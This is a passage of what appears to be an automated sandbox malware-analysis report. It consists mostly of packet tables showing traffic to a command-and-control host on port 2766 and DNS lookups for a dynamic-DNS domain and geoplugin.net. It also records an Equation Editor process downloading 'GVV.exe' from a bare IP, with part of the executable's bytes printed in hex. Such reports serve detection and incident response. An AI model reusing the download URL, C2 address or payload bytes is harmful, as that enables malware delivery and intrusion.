                                                                                            May 4, 2024 10:05:24.631871939 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.631877899 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631891012 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631903887 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631917000 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631927967 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.631930113 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631951094 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631963015 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.631964922 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.632045984 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634563923 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634634018 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634646893 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634665966 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634670019 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634699106 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634717941 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634737968 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634749889 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634763956 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634766102 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634782076 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634792089 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634793997 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634807110 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634819984 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634833097 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.634834051 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.634849072 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637638092 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637655020 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637667894 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637681007 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637687922 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637692928 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637701988 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637713909 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637727022 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637732029 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637738943 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637753963 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637763977 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637768030 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637782097 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637788057 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637795925 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637809992 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.637814045 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.637841940 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641104937 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641129017 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641141891 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641155958 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641159058 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641170025 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641185045 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641197920 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641218901 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641278028 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641293049 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641308069 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641325951 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641326904 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641339064 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641351938 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641359091 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.641360998 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.641400099 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644464016 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644486904 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644505978 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644520044 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644529104 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644558907 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644561052 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644572973 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644606113 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644660950 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644675016 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644689083 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644700050 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644706964 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644721031 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644723892 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644733906 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.644742966 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.644768000 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.645545959 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647090912 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647138119 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647151947 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647165060 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647172928 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647182941 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647203922 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647231102 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647267103 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647288084 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647300959 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647314072 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647325993 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647334099 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647345066 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647357941 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647358894 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.647370100 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.647392035 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649300098 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649315119 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649327040 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649339914 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649339914 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649352074 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649363995 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649368048 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649384975 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649388075 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649398088 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649410009 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649424076 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649430037 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649435997 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649446964 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649449110 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649463892 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.649472952 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.649501085 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651037931 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651051998 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651062012 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651074886 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651096106 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651154995 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651168108 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651180029 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651186943 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651194096 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651211977 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651217937 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651231050 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651242971 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651253939 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651254892 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651268005 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.651273966 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.651299953 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653395891 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653409958 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653423071 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653434992 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653444052 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653446913 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653461933 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653475046 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653476000 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653486967 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653498888 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653498888 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653517008 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653517962 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653529882 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653542995 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653549910 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.653556108 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.653582096 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656177998 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656240940 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656768084 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656784058 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656799078 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656812906 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656826019 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656829119 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656837940 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656846046 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656851053 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656871080 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656877041 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656884909 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656898975 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656910896 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656912088 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656924009 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.656934023 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.656953096 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.659054041 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659118891 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659162045 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.659181118 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659193993 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659219027 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659226894 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.659233093 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659267902 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.659296036 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659308910 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659322023 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659334898 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659338951 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.659348011 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.659368038 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.669883966 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.669925928 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.669928074 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.669939041 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.669953108 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.669976950 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.669990063 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670001984 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670013905 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670023918 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670027971 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670041084 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670053005 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670053005 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670072079 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670078039 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670089006 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670100927 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670105934 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670114040 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670135021 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670146942 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670161009 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670173883 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670173883 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.670187950 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:24.670207024 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:24.725622892 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:25.144294024 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:05:25.449572086 CEST8049164178.237.33.50192.168.2.22
                                                                                            May 4, 2024 10:05:25.451709032 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:05:25.452004910 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:05:25.761215925 CEST8049164178.237.33.50192.168.2.22
                                                                                            May 4, 2024 10:05:25.763999939 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:05:26.097522020 CEST491622766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:26.360584974 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:26.760814905 CEST8049164178.237.33.50192.168.2.22
                                                                                            May 4, 2024 10:05:26.760869026 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:05:31.414494038 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:31.624949932 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:31.625155926 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:31.837186098 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:31.837289095 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:32.048080921 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:32.048110962 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:32.048122883 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:32.048160076 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:32.258518934 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:32.260525942 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:32.260605097 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:32.301783085 CEST491632766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:32.512736082 CEST27664916323.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:46.661446095 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:05:46.663584948 CEST491622766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:05:46.922811031 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:06:16.676399946 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:06:16.678699970 CEST491622766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:06:16.939208984 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:06:31.387350082 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:06:32.166804075 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:06:33.773710012 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:06:36.971618891 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:06:43.274053097 CEST4916480192.168.2.22178.237.33.50
                                                                                            May 4, 2024 10:06:46.675183058 CEST27664916223.94.53.100192.168.2.22
                                                                                            May 4, 2024 10:06:46.676975965 CEST491622766192.168.2.2223.94.53.100
                                                                                            May 4, 2024 10:06:46.938390017 CEST27664916223.94.53.100192.168.2.22
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 4, 2024 10:05:19.836198092 CEST5456253192.168.2.228.8.8.8
                                                                                            May 4, 2024 10:05:19.996830940 CEST53545628.8.8.8192.168.2.22
                                                                                            May 4, 2024 10:05:24.899184942 CEST5291753192.168.2.228.8.8.8
                                                                                            May 4, 2024 10:05:25.060431957 CEST53529178.8.8.8192.168.2.22
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            May 4, 2024 10:05:19.836198092 CEST192.168.2.228.8.8.80x7f86Standard query (0)yuahdgbceja.sytes.netA (IP address)IN (0x0001)false
                                                                                            May 4, 2024 10:05:24.899184942 CEST192.168.2.228.8.8.80xf0b9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            May 4, 2024 10:05:19.996830940 CEST8.8.8.8192.168.2.220x7f86No error (0)yuahdgbceja.sytes.net23.94.53.100A (IP address)IN (0x0001)false
                                                                                            May 4, 2024 10:05:25.060431957 CEST8.8.8.8192.168.2.220xf0b9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                            • 23.94.54.101
                                                                                            • geoplugin.net
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.224916123.94.54.101801012C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 4, 2024 10:02:37.910119057 CEST69OUTGET /GVV.exe HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Host: 23.94.54.101
                                                                                            May 4, 2024 10:02:38.122266054 CEST1289INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Last-Modified: Thu, 02 May 2024 19:51:03 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "9ff8a010ca9cda1:0"
                                                                                            Server: Microsoft-IIS/8.5
                                                                                            Date: Sat, 04 May 2024 08:02:37 GMT
                                                                                            Content-Length: 1369600
                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 62 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 36 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELb3f"6w@@@@@d|@D{u4@.text `.rdata@@.datalpH@.rsrcD{@|@@.relocuvp@B [TRUNCATED]
                                                                                            May 4, 2024 10:02:38.122287035 CEST1289INData Raw: 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23
                                                                                            Data Ascii: h#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
                                                                                            May 4, 2024 10:02:38.122298002 CEST1289INData Raw: 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c fd ff
                                                                                            Data Ascii: O_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404Y
                                                                                            May 4, 2024 10:02:38.122313976 CEST1289INData Raw: 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15
                                                                                            Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0
